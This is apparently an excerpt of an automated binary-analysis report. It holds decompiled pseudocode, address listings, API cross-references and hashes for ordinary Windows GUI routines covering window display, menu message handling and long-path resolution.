        E0040C11C(_v12, 1);
        E00404184();
    }
    _t157 = *0x466580; // 0x27bf470
    E00457AB0(_t157);
    *(_v8 + 0x358) = *(_v8 + 0x358) | 0x00000004;
    _push(_t414);
    _push(0x453166);
    _push(*[fs:edx]);
    *[fs:edx] = _t416;
    if((*(_v8 + 0x1c) & 0x00000010) != 0) {
        _t161 = _v8;
        __eflags = *(_t161 + 0x1c) & 0x00000010;
        if((*(_t161 + 0x1c) & 0x00000010) != 0) {
            _t164 = _v8;
            __eflags = *(_t164 + 0x30);
            if(*(_t164 + 0x30) != 0) {
                _t165 = _v8;
                __eflags = *((char*)(_t165 + 0x1da));
                if(*((char*)(_t165 + 0x1da)) != 0) {
                    ShowWindow(E004423F8(_v8), 1);
                }
            }
        }
        L82:
        _pop(_t373);
        *[fs:eax] = _t373;
        _push(0x45316d);
        _t163 = _v8;
        *(_t163 + 0x358) = *(_t163 + 0x358) & 0x000000fb;
        return _t163;
    }
    _t169 = _v8;
    _t420 = *((char*)(_t169 + 0x1da));
    if(*((char*)(_t169 + 0x1da)) == 0) {
        _push(_t414);
        _push(0x453037);
        _push(*[fs:eax]);
        *[fs:eax] = _t416;
        E00403B24(_v8, __eflags);
        *[fs:eax] = 0;
        _t174 = *0x466584; // 0x27c66a0
        __eflags = *((intOrPtr*)(_t174 + 0x6c)) - _v8;
        if(*((intOrPtr*)(_t174 + 0x6c)) == _v8) {
            __eflags = 0;
            E00451B54(_v8, 0);
        }
        _t176 = _v8;
        __eflags = *((char*)(_t176 + 0x277)) - 1;
        if(*((char*)(_t176 + 0x277)) != 1) {
            _t177 = _v8;
            __eflags = *(_t177 + 0x358) & 0x00000008;
            if((*(_t177 + 0x358) & 0x00000008) == 0) {
                _t342 = 0;
                _t179 = E004423F8(_v8);
                _t180 = GetActiveWindow();
                __eflags = _t179 - _t180;
                if(_t179 == _t180) {
                    _t190 = IsIconic(E004423F8(_v8));
                    __eflags = _t190;
                    if(_t190 == 0) {
                        _t342 = E0044CB68(E004423F8(_v8));
                    }
                }
                __eflags = _t342;
                if(_t342 == 0) {
                    ShowWindow(E004423F8(_v8), 0);
                } else {
                    SetWindowPos(E004423F8(_v8), 0, 0, 0, 0, 0, 0x97);
                    SetActiveWindow(_t342);
                }
            } else {
                SetWindowPos(E004423F8(_v8), 0, 0, 0, 0, 0, 0x97);
            }
        } else {
            *((intOrPtr*)(*_v8 + 0xb0))();
        }
        goto L82;
    }
    _push(_t414);
    _push(0x452c30);
    _push(*[fs:eax]);
    *[fs:eax] = _t416;
    E00403B24(_v8, _t420);
    *[fs:eax] = 0;
    if(*(_v8 + 0x278) == 4 || *(_v8 + 0x278) == 6 && *((char*)(_v8 + 0x277)) == 1) {
        if(*((char*)(_v8 + 0x277)) != 1) {
            _t344 = E00454604() - *(_v8 + 0x48);
            __eflags = _t344;
            _t345 = _t344 >> 1;
            if(_t344 < 0) {
                asm("adc ebx, 0x0");
            }
            _t400 = E004545F8() - *(_v8 + 0x4c);
            __eflags = _t400;
            _t401 = _t400 >> 1;
            if(_t400 < 0) {
                asm("adc esi, 0x0");
            }
        } else {
            _t266 = *0x466580; // 0x27bf470
            _t348 = E0043A398(*((intOrPtr*)(_t266 + 0x44))) - *(_v8 + 0x48);
            _t345 = _t348 >> 1;
            if(_t348 < 0) {
                asm("adc ebx, 0x0");
            }
            _t270 = *0x466580; // 0x27bf470
            _t403 = E0043A3DC(*((intOrPtr*)(_t270 + 0x44))) - *(_v8 + 0x4c);
            _t401 = _t403 >> 1;
            if(_t403 < 0) {
                asm("adc esi, 0x0");
            }
        }
        if(_t345 < E0045461C()) {
            _t345 = E0045461C();
        }
        if(_t401 < E00454610()) {
            _t401 = E00454610();
        }
        *((intOrPtr*)(*_v8 + 0x88))(*(_v8 + 0x4c), *(_v8 + 0x48));
        if(*((char*)(_v8 + 0x57)) != 0) {
            E00450A44(_v8);
        }
        goto L59;
    } else {
        _t276 = *(_v8 + 0x278) & 0x000000ff;
        __eflags = _t276 + 0xfa - 2;
        if(_t276 + 0xfa - 2 >= 0) {
            __eflags = _t276 - 5;
            if(_t276 == 5) {
                _t277 = _v8;
                __eflags = *((char*)(_t277 + 0x277)) - 1;
                if(*((char*)(_t277 + 0x277)) != 1) {
                    _t350 = E00454634() - *(_v8 + 0x48);
                    __eflags = _t350;
                    _t351 = _t350 >> 1;
                    if(_t350 < 0) {
                        asm("adc ebx, 0x0");
                    }
                    _t405 = E00454628() - *(_v8 + 0x4c);
                    __eflags = _t405;
                    _t406 = _t405 >> 1;
                    if(_t405 < 0) {
                        asm("adc esi, 0x0");
                    }
                } else {
                    _t290 = *0x466580; // 0x27bf470
                    _t354 = E0043A398(*((intOrPtr*)(_t290 + 0x44))) - *(_v8 + 0x48);
                    __eflags = _t354;
                    _t351 = _t354 >> 1;
                    if(_t354 < 0) {
                        asm("adc ebx, 0x0");
                    }
                    _t294 = *0x466580; // 0x27bf470
                    _t408 = E0043A3DC(*((intOrPtr*)(_t294 + 0x44))) - *(_v8 + 0x4c);
                    __eflags = _t408;
                    _t406 = _t408 >> 1;
                    if(_t408 < 0) {
                        asm("adc esi, 0x0");
                    }
                }
                __eflags = _t351;
                if(_t351 < 0) {
                    _t351 = 0;
                    __eflags = 0;
                }
                __eflags = _t406;
                if(_t406 < 0) {
                    _t406 = 0;
                    __eflags = 0;
                }
                *((intOrPtr*)(*_v8 + 0x88))(*(_v8 + 0x4c), *(_v8 + 0x48));
            }
        } else {
            _t298 = *0x466580; // 0x27bf470
            _t409 = *(_t298 + 0x44);
            _t299 = _v8;
            __eflags = *((char*)(_t299 + 0x278)) - 7;
            if(*((char*)(_t299 + 0x278)) == 7) {
                _t391 = *0x44b288; // 0x44b2d4
                _t333 = E00403AB4(*(_v8 + 4), _t391);
                __eflags = _t333;
                if(_t333 != 0) {
                    _t409 = *(_v8 + 4);
                }
            }
            __eflags = _t409;
            if(_t409 == 0) {
                _t356 = E00454604() - *(_v8 + 0x48);
                __eflags = _t356;
                _t357 = _t356 >> 1;
                if(_t356 < 0) {
                    asm("adc ebx, 0x0");
                }
                _t411 = E004545F8() - *(_v8 + 0x4c);
                __eflags = _t411;
                _t412 = _t411 >> 1;
                if(_t411 < 0) {
                    asm("adc esi, 0x0");
                }
            } else {
                _t359 = E0044ED88(_t409);
                _t326 = *((intOrPtr*)(_t409 + 0x48)) - *(_v8 + 0x48);
                __eflags = _t326;
                _t327 = _t326 >> 1;
                if(_t326 < 0) {
                    asm("adc eax, 0x0");
                }
                _t357 = _t359 + _t327;
                _t329 = E0044EDA8(_t409);
                _t389 = *((intOrPtr*)(_t409 + 0x4c)) - *(_v8 + 0x4c);
                __eflags = _t389;
                _t390 = _t389 >> 1;
                if(_t389 < 0) {
                    asm("adc edx, 0x0");
                }
                _t412 = _t329 + _t390;
            }
            _t307 = E0045461C();
            __eflags = _t357 - _t307;
            if(_t357 < _t307) {
                _t357 = E0045461C();
            }
            _t309 = E00454610();
            __eflags = _t412 - _t309;
            if(_t412 < _t309) {
                _t412 = E00454610();
            }
            *((intOrPtr*)(*_v8 + 0x88))(*(_v8 + 0x4c), *(_v8 + 0x48));
            _t316 = _v8;
            __eflags = *((char*)(_t316 + 0x57));
            if(*((char*)(_t316 + 0x57)) != 0) {
                E00450A44(_v8);
            }
        }
        L59:
        *(_v8 + 0x278) = 0;
        if(*((char*)(_v8 + 0x277)) != 1) {
            ShowWindow(E004423F8(_v8), *(0x462740 + (*(_v8 + 0x273) & 0x000000ff) * 4));
        } else {
            if(*(_v8 + 0x273) != 2) {
                ShowWindow(E004423F8(_v8), *(0x462740 + (*(_v8 + 0x273) & 0x000000ff) * 4));
                _t241 = *(_v8 + 0x48) | *(_v8 + 0x4c) << 0x00000010;
                __eflags = _t241;
                CallWindowProcA(0x406e4c, E004423F8(_v8), 5, 0, _t241);
                E0043AC50(_v8);
            } else {
                _t252 = E004423F8(_v8);
                _t253 = *0x466580; // 0x27bf470
                SendMessageA(*(*((intOrPtr*)(_t253 + 0x44)) + 0x29c), 0x223, _t252, 0);
                ShowWindow(E004423F8(_v8), 3);
            }
            _t247 = *0x466580; // 0x27bf470
            SendMessageA(*(*((intOrPtr*)(_t247 + 0x44)) + 0x29c), 0x234, 0, 0);
        }
        goto L82;
    }
}

                                                                            0x00453059
                                                                            0x0045305b
                                                                            0x00453060
                                                                            0x00453060
                                                                            0x00453065
                                                                            0x00453068
                                                                            0x0045306f
                                                                            0x00453081
                                                                            0x00453084
                                                                            0x0045308b
                                                                            0x004530af
                                                                            0x004530b4
                                                                            0x004530bb
                                                                            0x004530c0
                                                                            0x004530c2
                                                                            0x004530cd
                                                                            0x004530d2
                                                                            0x004530d4
                                                                            0x004530e3
                                                                            0x004530e3
                                                                            0x004530d4
                                                                            0x004530e5
                                                                            0x004530e7
                                                                            0x00453119
                                                                            0x004530e9
                                                                            0x00453101
                                                                            0x00453107
                                                                            0x00453107
                                                                            0x0045308d
                                                                            0x004530a5
                                                                            0x004530a5
                                                                            0x00453071
                                                                            0x00453076
                                                                            0x00453076
                                                                            0x00000000
                                                                            0x0045306f
                                                                            0x00452c0e
                                                                            0x00452c0f
                                                                            0x00452c14
                                                                            0x00452c17
                                                                            0x00452c21
                                                                            0x00452c2b
                                                                            0x00452c51
                                                                            0x00452c7d
                                                                            0x00452cc8
                                                                            0x00452cc8
                                                                            0x00452ccb
                                                                            0x00452ccd
                                                                            0x00452ccf
                                                                            0x00452ccf
                                                                            0x00452ce1
                                                                            0x00452ce1
                                                                            0x00452ce4
                                                                            0x00452ce6
                                                                            0x00452ce8
                                                                            0x00452ce8
                                                                            0x00452c7f
                                                                            0x00452c7f
                                                                            0x00452c91
                                                                            0x00452c94
                                                                            0x00452c96
                                                                            0x00452c98
                                                                            0x00452c98
                                                                            0x00452c9b
                                                                            0x00452cad
                                                                            0x00452cb0
                                                                            0x00452cb2
                                                                            0x00452cb4
                                                                            0x00452cb4
                                                                            0x00452cb2
                                                                            0x00452cf7
                                                                            0x00452d03
                                                                            0x00452d03
                                                                            0x00452d11
                                                                            0x00452d1d
                                                                            0x00452d1d
                                                                            0x00452d36
                                                                            0x00452d43
                                                                            0x00452d4c
                                                                            0x00452d4c
                                                                            0x00000000
                                                                            0x00452d56
                                                                            0x00452d59
                                                                            0x00452d65
                                                                            0x00452d68
                                                                            0x00452e76
                                                                            0x00452e78
                                                                            0x00452e7e
                                                                            0x00452e81
                                                                            0x00452e88
                                                                            0x00452ed3
                                                                            0x00452ed3
                                                                            0x00452ed6
                                                                            0x00452ed8
                                                                            0x00452eda
                                                                            0x00452eda
                                                                            0x00452eec
                                                                            0x00452eec
                                                                            0x00452eef
                                                                            0x00452ef1
                                                                            0x00452ef3
                                                                            0x00452ef3
                                                                            0x00452e8a
                                                                            0x00452e8a
                                                                            0x00452e9c
                                                                            0x00452e9c
                                                                            0x00452e9f
                                                                            0x00452ea1
                                                                            0x00452ea3
                                                                            0x00452ea3
                                                                            0x00452ea6
                                                                            0x00452eb8
                                                                            0x00452eb8
                                                                            0x00452ebb
                                                                            0x00452ebd
                                                                            0x00452ebf
                                                                            0x00452ebf
                                                                            0x00452ebd
                                                                            0x00452ef6
                                                                            0x00452ef8
                                                                            0x00452efa
                                                                            0x00452efa
                                                                            0x00452efa
                                                                            0x00452efc
                                                                            0x00452efe
                                                                            0x00452f00
                                                                            0x00452f00
                                                                            0x00452f00
                                                                            0x00452f19
                                                                            0x00452f19
                                                                            0x00452d6e
                                                                            0x00452d6e
                                                                            0x00452d73
                                                                            0x00452d76
                                                                            0x00452d79
                                                                            0x00452d80
                                                                            0x00452d88
                                                                            0x00452d8e
                                                                            0x00452d93
                                                                            0x00452d95
                                                                            0x00452d9a
                                                                            0x00452d9a
                                                                            0x00452d95
                                                                            0x00452d9d
                                                                            0x00452d9f
                                                                            0x00452de8
                                                                            0x00452de8
                                                                            0x00452deb
                                                                            0x00452ded
                                                                            0x00452def
                                                                            0x00452def
                                                                            0x00452e01
                                                                            0x00452e01
                                                                            0x00452e04
                                                                            0x00452e06
                                                                            0x00452e08
                                                                            0x00452e08
                                                                            0x00452da1
                                                                            0x00452da8
                                                                            0x00452db0
                                                                            0x00452db0
                                                                            0x00452db3
                                                                            0x00452db5
                                                                            0x00452db7
                                                                            0x00452db7
                                                                            0x00452dba
                                                                            0x00452dbe
                                                                            0x00452dc9
                                                                            0x00452dc9
                                                                            0x00452dcc
                                                                            0x00452dce
                                                                            0x00452dd0
                                                                            0x00452dd0
                                                                            0x00452dd5
                                                                            0x00452dd5
                                                                            0x00452e10
                                                                            0x00452e15
                                                                            0x00452e17
                                                                            0x00452e23
                                                                            0x00452e23
                                                                            0x00452e2a
                                                                            0x00452e2f
                                                                            0x00452e31
                                                                            0x00452e3d
                                                                            0x00452e3d
                                                                            0x00452e56
                                                                            0x00452e5c
                                                                            0x00452e5f
                                                                            0x00452e63
                                                                            0x00452e6c
                                                                            0x00452e6c
                                                                            0x00452e63
                                                                            0x00452f1f
                                                                            0x00452f22
                                                                            0x00452f33
                                                                            0x00453009
                                                                            0x00452f39
                                                                            0x00452f43
                                                                            0x00452f96
                                                                            0x00452faa
                                                                            0x00452faa
                                                                            0x00452fbf
                                                                            0x00452fc7
                                                                            0x00452f45
                                                                            0x00452f4a
                                                                            0x00452f55
                                                                            0x00452f64
                                                                            0x00452f74
                                                                            0x00452f74
                                                                            0x00452fd5
                                                                            0x00452fe4
                                                                            0x00452fe4
                                                                            0x00000000
                                                                            0x00452f33

                                                                            Strings
                                                                            • x5B , xrefs: 00452BAF
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: LoadString
                                                                            • String ID: x5B
                                                                            • API String ID: 2948472770-2671772400
                                                                            • Opcode ID: b6cab51178b630a4eb60dbe479c4b7adbb6bf75e1f0d25b5798c259387243a29
                                                                            • Instruction ID: fdf0033afcd44717c8607ee86a32dba8197f5f55c0a5171d2b836c552c812610
                                                                            • Opcode Fuzzy Hash: b6cab51178b630a4eb60dbe479c4b7adbb6bf75e1f0d25b5798c259387243a29
                                                                            • Instruction Fuzzy Hash: E6026F31A00204EFDB10DF69DA86B9D77F4AB05305F1504AAFD04EB3A3D7B8AE449B49
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
E00405CBC(CHAR* __eax, int __edx) {
    CHAR* _v8;
    int _v12;
    CHAR* _v16;
    void* _v20;
    struct _WIN32_FIND_DATAA _v338;
    char _v599;
    void* _t102;
    intOrPtr* _t103;
    CHAR* _t106;
    CHAR* _t108;
    char* _t109;
    void* _t110;

    _v12 = __edx;
    _v8 = __eax;
    _v16 = _v8;
    _v20 = GetModuleHandleA("kernel32.dll");
    if(_v20 == 0) {
        L4:
        if( *_v8 != 0x5c) {
            _t108 = &(_v8[2]);
            goto L10;
        } else {
            if(_v8[1] == 0x5c) {
                _t109 = E00405C9C( &(_v8[2]));
                if( *_t109 != 0) {
                    _t17 = _t109 + 1; // 0x1
                    _t108 = E00405C9C(_t17);
                    if( *_t108 != 0) {
                        L10:
                        _t102 = _t108 - _v8;
                        lstrcpynA( &_v599, _v8, _t102 + 1);
                        while( *_t108 != 0) {
                            _t106 = E00405C9C( &(_t108[1]));
                            if(_t106 - _t108 + _t102 + 1 <= 0x105) {
                                lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1);
                                _v20 = FindFirstFileA( &_v599, &_v338);
                                if(_v20 != 0xffffffff) {
                                    FindClose(_v20);
                                    if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) {
                                        *((char*)(_t110 + _t102 - 0x253)) = 0x5c;
                                        lstrcpynA( &(( &(( &_v599)[_t102]))[1]), &(_v338.cFileName), 0x105 - _t102 - 1);
                                        _t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1;
                                        _t108 = _t106;
                                        continue;
                                    }
                                }
                            }
                            goto L17;
                        }
                        lstrcpynA(_v8, &_v599, _v12);
                    }
                }
            }
        }
    } else {
        _t103 = GetProcAddress(_v20, "GetLongPathNameA");
        if(_t103 == 0) {
            goto L4;
        } else {
            _push(0x105);
            _push( &_v599);
            _push(_v8);
            if( *_t103() == 0) {
                goto L4;
            } else {
                lstrcpynA(_v8, &_v599, _v12);
            }
        }
    }
    L17:
    return _v16;
}
          


                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00400000,00461790), ref: 00405CD9
                                                                            • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 00405CF0
                                                                            • lstrcpynA.KERNEL32(?,?,?), ref: 00405D20
                                                                            • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405D84
                                                                            • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DBA
                                                                            • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DCD
                                                                            • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DDF
                                                                            • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000,00461790), ref: 00405DEB
                                                                            • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00400000), ref: 00405E1F
                                                                            • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,?), ref: 00405E2B
                                                                            • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 00405E4D
                                                                            Strings
                                                                            • kernel32.dll , xrefs: 00405CD4
                                                                            • \ , xrefs: 00405DFD
                                                                            • GetLongPathNameA , xrefs: 00405CE7
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                            • String ID: GetLongPathNameA$\$kernel32.dll
                                                                            • API String ID: 3245196872-1565342463
                                                                            • Opcode ID: 4c9fd7f5c89b396a6d77d29f335b003aeb63b386fe31a806673f744a8a1e1af7
                                                                            • Instruction ID: ed9b063c7604b8117c629610380ef8646edce7950b787036461636691dd4187e
                                                                            • Opcode Fuzzy Hash: 4c9fd7f5c89b396a6d77d29f335b003aeb63b386fe31a806673f744a8a1e1af7
                                                                            • Instruction Fuzzy Hash: AF415171900658ABDB10EBE8CC89ADFB3ACEF04304F1444BBA558F7281D6789F408F58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 92%
                                                                                                                                  E004342B4(intOrPtr __eax, void* __ebx, int* __edx, void* __edi, void* __esi) { 				intOrPtr _v8; 				struct HMENU__* _v12; 				signed int _v16; 				signed int _v17; 				intOrPtr _v24; 				int _v28; 				struct HDC__* _v32; 				intOrPtr _v36; 				intOrPtr _v40; 				intOrPtr _v44; 				intOrPtr* _v48; 				char _v52; 				intOrPtr _t137; 				signed int _t138; 				signed int _t151; 				signed int _t152; 				intOrPtr* _t154; 				void* _t159; 				struct HMENU__* _t161; 				intOrPtr* _t166; 				void* _t174; 				signed int _t178; 				signed int _t182; 				void* _t183; 				void* _t215; 				void* _t253; 				signed int _t259; 				void* _t267; 				signed int _t273; 				signed int _t274; 				signed int _t276; 				signed int _t277; 				signed int _t279; 				signed int _t280; 				signed int _t282; 				signed int _t283; 				signed int _t285; 				signed int _t286; 				signed int _t288; 				signed int _t289; 				signed int _t292; 				signed int _t293; 				intOrPtr _t313; 				intOrPtr _t335; 				intOrPtr _t344; 				intOrPtr _t348; 				intOrPtr* _t355; 				signed int _t357; 				intOrPtr* _t358; 				signed int _t369; 				signed int _t370; 				signed int _t371; 				signed int _t372; 				signed int _t373; 				signed int _t374; 				signed int _t375; 				int* _t377; 				void* _t379; 				void* _t380; 				intOrPtr _t381; 				void* _t382;  				_t379 = _t380; 				_t381 = _t380 + 0xffffffd0; 				_v52 = 0; 				_t377 = __edx; 				_v8 = __eax; 				_push(_t379); 				_push(0x4347e8); 				_push( *[fs:eax]); 				 *[fs:eax] = _t381; 				_t137 =  *((intOrPtr*)(__edx)); 				_t382 = _t137 - 0x111; 				if(_t382 > 0) { 					_t138 = _t137 - 0x117; 					__eflags = _t138; 					if(_t138 == 0) { 						_t273 =  *((intOrPtr*)(_v8 + 8)) - 1; 						__eflags = _t273; 						if(_t273 < 0) { 							goto L67; 						} else { 							_t274 = _t273 + 1; 							_t369 = 0; 							__eflags = 0; 							
while(1) { 								_t151 = E004333E0(E0041A80C(_v8, _t369), _t377[1], __eflags); 								__eflags = _t151; 								if(_t151 != 0) { 									goto L68; 								} 								_t369 = _t369 + 1; 								_t274 = _t274 - 1; 								__eflags = _t274; 								if(_t274 != 0) { 									continue; 								} else { 									goto L67; 								} 								goto L68; 							} 						} 					} else { 						_t152 = _t138 - 8; 						__eflags = _t152; 						if(_t152 == 0) { 							_v17 = 0; 							__eflags =  *(__edx + 6) & 0x00000010; 							if(( *(__edx + 6) & 0x00000010) != 0) { 								_v17 = 1; 							} 							_t276 =  *((intOrPtr*)(_v8 + 8)) - 1; 							__eflags = _t276; 							if(__eflags < 0) { 								L32: 								_t154 =  *0x462da4; // 0x466580 								E004579C0( *_t154, 0, __eflags); 								goto L67; 							} else { 								_t277 = _t276 + 1; 								_t370 = 0; 								__eflags = 0; 								while(1) { 									__eflags = _v17 - 1; 									if(_v17 != 1) { 										_v12 = _t377[1] & 0x0000ffff; 									} else { 										_t161 = _t377[2]; 										__eflags = _t161; 										if(_t161 == 0) { 											_v12 = 0xffffffff; 										} else { 											_v12 = GetSubMenu(_t161, _t377[1] & 0x0000ffff); 										} 									} 									_t159 = E0041A80C(_v8, _t370); 									_t297 = _v17 & 0x000000ff; 									_v16 = E00433324(_t159, _v17 & 0x000000ff, _v12); 									__eflags = _v16; 									if(__eflags != 0) { 										break; 									} 									_t370 = _t370 + 1; 									_t277 = _t277 - 1; 									__eflags = _t277; 									if(__eflags != 0) { 										continue; 									} else { 										goto L32; 									} 									goto L68; 								} 								E00437730( *((intOrPtr*)(_v16 + 0x58)), _t297,  &_v52, __eflags); 								_t166 =  *0x462da4; // 0x466580 								E004579C0( *_t166, _v52, __eflags); 							} 						} else { 							__eflags = _t152 == 1; 							if(_t152 == 1) { 								_t279 =  *((intOrPtr*)(_v8 + 8)) - 1; 								__eflags = _t279; 								if(_t279 < 0) { 									
goto L67; 								} else { 									_t280 = _t279 + 1; 									_t371 = 0; 									__eflags = 0; 									while(1) { 										_v48 = E0041A80C(_v8, _t371); 										_t174 =  *((intOrPtr*)( *_v48 + 0x34))(); 										__eflags = _t174 - _t377[2]; 										if(_t174 == _t377[2]) { 											break; 										} 										_t178 = E00433324(_v48, 1, _t377[2]); 										__eflags = _t178; 										if(_t178 == 0) { 											_t371 = _t371 + 1; 											_t280 = _t280 - 1; 											__eflags = _t280; 											if(_t280 != 0) { 												continue; 											} else { 												goto L67; 											} 										} else { 											break; 										} 										goto L68; 									} 									E00433E94(_v48, _t377); 								} 							} else { 								goto L67; 							} 						} 					} 					goto L68; 				} else { 					if(_t382 == 0) { 						_t282 =  *((intOrPtr*)(_v8 + 8)) - 1; 						__eflags = _t282; 						if(_t282 < 0) { 							goto L67; 						} else { 							_t283 = _t282 + 1; 							_t372 = 0; 							__eflags = 0; 							while(1) { 								E0041A80C(_v8, _t372); 								_t182 = E004333C4(_t377[1] & 0x0000ffff, __eflags); 								__eflags = _t182; 								if(_t182 != 0) { 									goto L68; 								} 								_t372 = _t372 + 1; 								_t283 = _t283 - 1; 								__eflags = _t283; 								if(_t283 != 0) { 									continue; 								} else { 									goto L67; 								} 								goto L68; 							} 						} 						goto L68; 					} else { 						_t183 = _t137 - 0x2b; 						if(_t183 == 0) { 							_v40 =  *((intOrPtr*)(__edx + 8)); 							_t285 =  *((intOrPtr*)(_v8 + 8)) - 1; 							__eflags = _t285; 							if(_t285 < 0) { 								goto L67; 							} else { 								_t286 = _t285 + 1; 								_t373 = 0; 								__eflags = 0; 								while(1) { 									_v16 = E00433324(E0041A80C(_v8, _t373), 0,  *((intOrPtr*)(_v40 + 8))); 									__eflags = _v16; 									if(_v16 != 0) { 										break; 									} 									_t373 = _t373 + 1; 									_t286 = _t286 - 1; 									__eflags = 
_t286; 									if(_t286 != 0) { 										continue; 									} else { 										goto L67; 									} 									goto L69; 								} 								_v24 = E004262D8(0, 1); 								_push(_t379); 								_push(0x43461b); 								_push( *[fs:eax]); 								 *[fs:eax] = _t381; 								_v28 = SaveDC( *(_v40 + 0x18)); 								_push(_t379); 								_push(0x4345fe); 								_push( *[fs:eax]); 								 *[fs:eax] = _t381; 								E004268A4(_v24,  *(_v40 + 0x18)); 								E00426738(_v24); 								E00434AAC(_v16, _v40 + 0x1c, _v24,  *(_v40 + 0x10) & 0x0000ffff); 								_pop(_t335); 								 *[fs:eax] = _t335; 								_push(0x434605); 								__eflags = 0; 								E004268A4(_v24, 0); 								return RestoreDC( *(_v40 + 0x18), _v28); 							} 						} else { 							_t215 = _t183 - 1; 							if(_t215 == 0) { 								_v44 =  *((intOrPtr*)(__edx + 8)); 								_t288 =  *((intOrPtr*)(_v8 + 8)) - 1; 								__eflags = _t288; 								if(_t288 < 0) { 									goto L67; 								} else { 									_t289 = _t288 + 1; 									_t374 = 0; 									__eflags = 0; 									while(1) { 										_v16 = E00433324(E0041A80C(_v8, _t374), 0,  *((intOrPtr*)(_v44 + 8))); 										__eflags = _v16; 										if(_v16 != 0) { 											break; 										} 										_t374 = _t374 + 1; 										_t289 = _t289 - 1; 										__eflags = _t289; 										if(_t289 != 0) { 											continue; 										} else { 											goto L67; 										} 										goto L69; 									} 									_v32 = GetWindowDC( *(_v8 + 0x10)); 									 *[fs:eax] = _t381; 									_v24 = E004262D8(0, 1); 									 *[fs:eax] = _t381; 									_v28 = SaveDC(_v32); 									 *[fs:eax] = _t381; 									E004268A4(_v24, _v32); 									E00426738(_v24); 									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x43471c, _t379,  *[fs:eax], 0x434739, _t379,  *[fs:eax], 0x43475e, _t379); 									_pop(_t344); 									 *[fs:eax] = _t344; 									_push(0x434723); 									__eflags = 0; 									E004268A4(_v24, 0); 									return RestoreDC(_v32, 
_v28); 								} 							} else { 								if(_t215 == 0x27) { 									_v36 =  *((intOrPtr*)(__edx + 8)); 									_t292 =  *((intOrPtr*)(_v8 + 8)) - 1; 									__eflags = _t292; 									if(_t292 < 0) { 										goto L67; 									} else { 										_t293 = _t292 + 1; 										_t375 = 0; 										__eflags = 0; 										while(1) { 											_t253 =  *((intOrPtr*)( *((intOrPtr*)(E0041A80C(_v8, _t375))) + 0x34))(); 											_t348 = _v36; 											__eflags = _t253 -  *((intOrPtr*)(_t348 + 0xc)); 											if(_t253 !=  *((intOrPtr*)(_t348 + 0xc))) { 												_v16 = E00433324(E0041A80C(_v8, _t375), 1,  *((intOrPtr*)(_v36 + 0xc))); 											} else { 												_v16 =  *((intOrPtr*)(E0041A80C(_v8, _t375) + 0x34)); 											} 											__eflags = _v16; 											if(_v16 != 0) { 												break; 											} 											_t375 = _t375 + 1; 											_t293 = _t293 - 1; 											__eflags = _t293; 											if(_t293 != 0) { 												continue; 											} else { 												goto L67; 											} 											goto L68; 										} 										_t259 = E00433354(E0041A80C(_v8, _t375), 1,  *((intOrPtr*)(_v36 + 8))); 										__eflags = _t259; 										if(_t259 == 0) { 											_t267 = E0041A80C(_v8, _t375); 											__eflags = 0; 											_t259 = E00433354(_t267, 0,  *((intOrPtr*)(_v36 + 0xc))); 										} 										_t355 =  *0x462f14; // 0x466584 										_t357 =  *( *_t355 + 0x6c); 										__eflags = _t357; 										if(_t357 != 0) { 											__eflags = _t259; 											if(_t259 == 0) { 												_t259 =  *(_t357 + 0x160); 											} 											__eflags =  *(_t357 + 0x270) & 0x00000008; 											if(( *(_t357 + 0x270) & 0x00000008) == 0) { 												_t358 =  *0x462da4; // 0x466580 												E004575F4( *_t358, _t293, _t259, _t375, _t377); 											} else { 												E0045767C(); 											} 										} 									} 								} else { 									L67: 									_t377[3] = DefWindowProcA( *(_v8 + 0x10),  *_t377, _t377[1], _t377[2]); 					
			} 								L68: 								_pop(_t313); 								 *[fs:eax] = _t313; 								_push(0x4347ef); 								return E0040473C( &_v52); 							} 						} 					} 				} 				L69: 			}                        

                                                                            0x00434685
                                                                            0x00434694
                                                                            0x004346a2
                                                                            0x004346ae
                                                                            0x004346bc
                                                                            0x004346c5
                                                                            0x004346da
                                                                            0x004346f4
                                                                            0x004346f9
                                                                            0x004346fc
                                                                            0x004346ff
                                                                            0x00434704
                                                                            0x00434709
                                                                            0x0043471b
                                                                            0x0043471b
